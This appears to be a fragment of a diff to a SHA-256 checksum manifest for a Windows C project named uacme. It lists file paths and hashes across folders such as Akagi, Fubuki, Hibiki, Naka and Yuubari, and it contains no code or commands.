5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
f166daea90a02bd9ba0fbbfae26c668a470f680a5ed752bdd4052fb82ef78b7c *Source\Akagi\hybrids.c
49458af00933874313d878e3c223473c10eff60a3e79d209967eee8a78d9a344 *Source\Akagi\hybrids.c
81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
220dd784ef9475bbeb21f7ecb9c54acfd571f8c420dc7e0c6dd632694261ab3b *Source\Akagi\main.c
78598dd659978dd673739cefac448aeb5bb6799692c5f23ba36300115f9d43ae *Source\Akagi\main.c
dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
795a325be6a31be7d91d09c230a00b2503ad061080fb494ae49c532a283d7bb8 *Source\Akagi\pitou.c
1f4be768fd390a3c8f80a326f10bf626c01da4e70cf89c46139dc64c8425647f *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
e81122b88e1574515722554f2edddde13db239fc21617fe7a78a8827d6ea07fb *Source\Akagi\Resource.rc
4da1fb2643bae679d681ef3ea94539a58177098ea36ba7cf7227ff48cff5ad2f *Source\Akagi\Resource.rc
d76f935faa2318354b976f83a30223e4fadcf8ae3df720577aafa5b2d5a7deaa *Source\Akagi\simda.c
450593a7d138e57b10200ecaeb1ac75ef0c8dd348f64b3a2e9e960740ca4a0fd *Source\Akagi\simda.h
41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
8ba2fdaba2d39c321b8d17974bafbb56554d7e049e4494c5a9bcd59765916d17 *Source\Akagi\sirefef.h
084bbb45cfae0af57bbef71b351a28c03e20ce7666c3e3e38d3ed3597bdccb1a *Source\Akagi\sup.c
b190b33893283d13de945bd0c63fd1f3e0f5df3c8f74e50daa29c3bbf57cac9b *Source\Akagi\sup.h
ed49c508485eb1a372ddcd131aa688c969fa536f3845055e51b5611c2a792d49 *Source\Akagi\uacme.vcxproj
fdb9f869c33fd8208c837548d3a827e20312249455c19f8cd34a01fd20e2cccd *Source\Akagi\uacme.vcxproj.filters
eb362511262bd72ee14392aac1fd7c64f4be77d96b47797ac69dbadc873acc50 *Source\Akagi\uacme.vcxproj.user
087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd
b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd
c650a5448056d708d21799617246ee47f9569afa5415e78f9be07d85055ead46 *Source\Akagi\bin\Ikazuchi64.cd
8b47a94d19a8c883e95174faa880839c814501326db310c6c166697b0124314c *Source\Akagi\uacme.vcxproj
05f28a23f92ed4dee4490ed547d06d49e90d521037711ec4d63382d83d868b4c *Source\Akagi\uacme.vcxproj.filters
3b33eaab5cf41c023af5b51bf6348ecb6b6181b81b82d1ae4a577f84c7cc2069 *Source\Akagi\uacme.vcxproj.user
d47ce8e2e94e6837f60ffe384e50d72c896e3325a49d45021787b3754f9eb6c7 *Source\Akagi\bin\Fubuki32.cd
cf617d6472d2f81d11cfdf654c8ccccc3ef2d14bc5854e0deefdb53f72cefb47 *Source\Akagi\bin\Fubuki64.cd
94ebfac14f977d4bd8a0e655eac290c49b20285d8fff32e33d668cce51580a1f *Source\Akagi\bin\Hibiki32.cd
ec5e1b33a24f3278b1bc070333ed495909d7ded3d49156c97dda72131c01cbe0 *Source\Akagi\bin\Hibiki64.cd
c61f3a9a959eb6bd2eaec276eff854d07f6f183d46588da5e68c0e8a009f5d1d *Source\Akagi\bin\Ikazuchi32.cd
37cee2abfa1f8e3713e4b7282d8888c1d91fcbf517edd4c5d452942ab2c7057e *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj
f49b43684d8b4bb77cbfc3a304951241d868259ece59af019fc375748dab72dd *Source\Akagi\tests\test.c
dab6e990a8872a3c25f95e7ce2a8ad2da1f99167b563662bdad44e4e20b7c769 *Source\Akagi\tests\test.h
e1a1592759e7f8f1f50e3f5b1ad55067ec30bcd44072f84a163f91956b72710d *Source\Fubuki\dll.vcxproj
d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
57aa4133d0328d2a44825ff4d8804f52518fdea6e83d9cca7b60c3777324be85 *Source\Fubuki\dllmain.c
a4cf42b8c2ea71d8efa61e55b54a736c256d1cdd99f5774a15beec8b85327d68 *Source\Fubuki\dllmain.c
c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
b356eba53196c805864e2ac2fd5a4b38984a377698320c34dc70484de61f2adb *Source\Fubuki\version.rc
0109acffa378156d44353a55d398f4f48bb51e4c59e268c8f3ffba6553f307ef *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c
769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj
47aed58ea27d928443197579dfa0c52718a3f6784464c9b1e7cd965d790e112b *Source\Hibiki\dllmain.c
691f137f1ce6a476d1bc9d8cdc1c6b3ad977d888824ce1b9bed356e94ea4d8fb *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
2445782239ea27dce10bca969eff59bb279b963b05c95e5b47d8634f86c0da03 *Source\Hibiki\version.rc
3e987580133daa652cfb7639c83d852b004400a8beff5f6abf6ec0d0b824c29c *Source\Ikazuchi\dllmain.c
4dfa74d554b7be0eb26c1d08232401bd33ffca0e5a619bcd209d4839425f7b3e *Source\Hibiki\version.rc
e04bfbf94d1d78162e3960022f0b3583433354ef3a56d7b2786da35178af7c0a *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
71808e6ef3af9c0fa3173d1c01aad2f4c2ed20024e6bd068631796949966f1fc *Source\Ikazuchi\Ikazuchi.vcxproj
b34657273d28a94323579208865216135b219ec9d63a4ae15047a3fd529e7b95 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
0b180f5168abbb6fa6754931ab3de21f0fdc964615a591a4154040a745a328b8 *Source\Ikazuchi\version.rc
851c5fb0f9333d779542def40e124021fd84e1ab56075a5a0da64b33abe5f892 *Source\Inazuma\Inazuma.vcxproj
c3191014030e36944c1e43d73369df8093cead1b1bf730975dc43abe9fb5ad87 *Source\Ikazuchi\version.rc
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
602a920e9d044190055552068bf5e6cc97589988bf7294882e77b2b84fb0e380 *Source\Inazuma\main.c
fc35222348ffb1c055cb1e8153d15d6c11667f5073ad2f9a821ee090ab8294b1 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
9d5b86807c7ad8b954b4bc9ade511e57ccfc71854d228f48fb4bfd6ae9f2235f *Source\Naka\main.c
4463b699dbad298e546848003f78308dc056267c6628f72485571f08da08826e *Source\Naka\Naka.vcxproj
3aa5f39feacabfdbf5c82fcbf523514804cc15d1bcf54f1fc9464d53014efd05 *Source\Naka\main.c
5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
db0e164fc1f567f1759603df36a0e44ebb728281fd1aa95977c3d575db58c34c *Source\Shared\ntos.h
009c1782cdeb0bffa9fd98ea42d74e3f5a050ea159f4c78d8252eb86d60febf2 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c
@ -103,13 +106,13 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Shared\_strncmpi.c
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\_strncpy.c
52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\Shared\_strstri.c
f757bdc4baf67493591a14d11aef2adaa32690376fc34b698627aec63b156539 *Source\Yuubari\appinfo.c
24432117a04e33dfb64e6defc8fcfc7f1298dde6bde8231d667bd9c9879e5755 *Source\Yuubari\appinfo.c
241814ee27790e05e3e3e3b0555720933175d3202855a9f2efff42b90496a1a1 *Source\Yuubari\appinfo.h
ffd6ad03b61ebb541f76c9ba105a916671f89c8220bf145b4d154943c94e85a9 *Source\Yuubari\basic.c
6cc92c6f21f4a9ad09c05f562404b195b8a7130bf512f39c4a6af6a46b97d6e0 *Source\Yuubari\basic.h
048c8865e9c699c0dbd328983fddefefba5c3bb9f1c0a146d7e4e42aa7dac2a1 *Source\Yuubari\comobj.c
9386b37510b8ea6c681d16b8a308d4e1fb0a030ed174cdd0899683a2e88d44ed *Source\Yuubari\comobj.h
1fb49d3f7ab0acecdc247bf0d9154a5ec37b539d4db0ed4d6a620af6f5220ad1 *Source\Yuubari\consts.h
9ddb6961b858c7841c00da8924f3daa705032305873c5ff24bdeab8f7a5be4df *Source\Yuubari\consts.h
a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari\cui.c
2d2891290f7780933347dcbd091bf0a17af6ee52257b5497951ff80567e03f88 *Source\Yuubari\cui.h
6916b415010caa7e0801ea515a722dbff8a3329ffa716977914f5b81a337d0c3 *Source\Yuubari\fusion.c
@ -117,16 +120,16 @@ a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari
d8300b2b51d4f179dd2eaa453dafef6da331889a6bff97c281303cc980fc6a67 *Source\Yuubari\global.h
04bd5497fa817f15e3f6d63325c5e20172fde7f4c668d1dfdc35f99b228d3f33 *Source\Yuubari\logger.c
9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4 *Source\Yuubari\logger.h
5bd341aff5d0c75429580da5c2f9ec28753e82e3770d5028e243922784738a62 *Source\Yuubari\main.c
ac3026bf74108f833d3059411f4d21f1146f686329fd2c141cb4883cc1909ae7 *Source\Yuubari\patterns.h
1fe4b833867d06e3b0d156f0990aa6e83938bcf62da460747286b06e069498a3 *Source\Yuubari\main.c
321c200b9b4452270e4b66b23d004e421e2767949622ae9a9b3953c402b870e1 *Source\Yuubari\patterns.h
76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022 *Source\Yuubari\resource.h
0e6bff106ee03caa9b94dca4542432e6c9d47d22e7f47ebf30a38b2c5bbc1b51 *Source\Yuubari\Resource.rc
c598f46133f3f8d458b2b45ae9a4f77696403fcd0e4f1a740df161ca824943d5 *Source\Yuubari\Resource.rc
c90af8a79275833683c07bc639005a168ac194ea9203ad5c76c211008a1e8591 *Source\Yuubari\sup.c
80b0d3d17b61d83dd8dda02ce006acfa644d6ec51439454fb8a9485a353a07e5 *Source\Yuubari\sup.h
ab68c022e2fc5a8a3f6d5c1dcff00825ac9c533160983d33e93931573c02d85d *Source\Yuubari\wintrustex.h
d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e *Source\Yuubari\yuubari.ico
1f39aa99875efc5db0e4e041657d3c6a9a9bb5de320c53f3a777cfcb29f4c643 *Source\Yuubari\Yuubari.vcxproj
23b7bff5645fe2c5e928ba1807c561449148c16423d5b4c1d87caa20383f9504 *Source\Yuubari\Yuubari.vcxproj
a23fb5dccb937ee5103c59c6775f3017b97396d43f1399d1a2ada3ce9c8fd82f *Source\Yuubari\Yuubari.vcxproj.filters
86b904f9099ce583f13128e998a7d9f1f48682354b12c778a23615c361c44425 *Source\Yuubari\Yuubari.vcxproj.user
3cf272ba16777722e4c9920655ee501ccfafa84538af835e6c3a3f972aa70a7c *Source\Yuubari\tests\test_fusion.c
7b670598687782b8ef5ff7a95b54118dc5a4743a88c28100878e9855d6a2c250 *Source\Yuubari\tests\test_fusion.c
8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f *Source\Yuubari\tests\test_fusion.h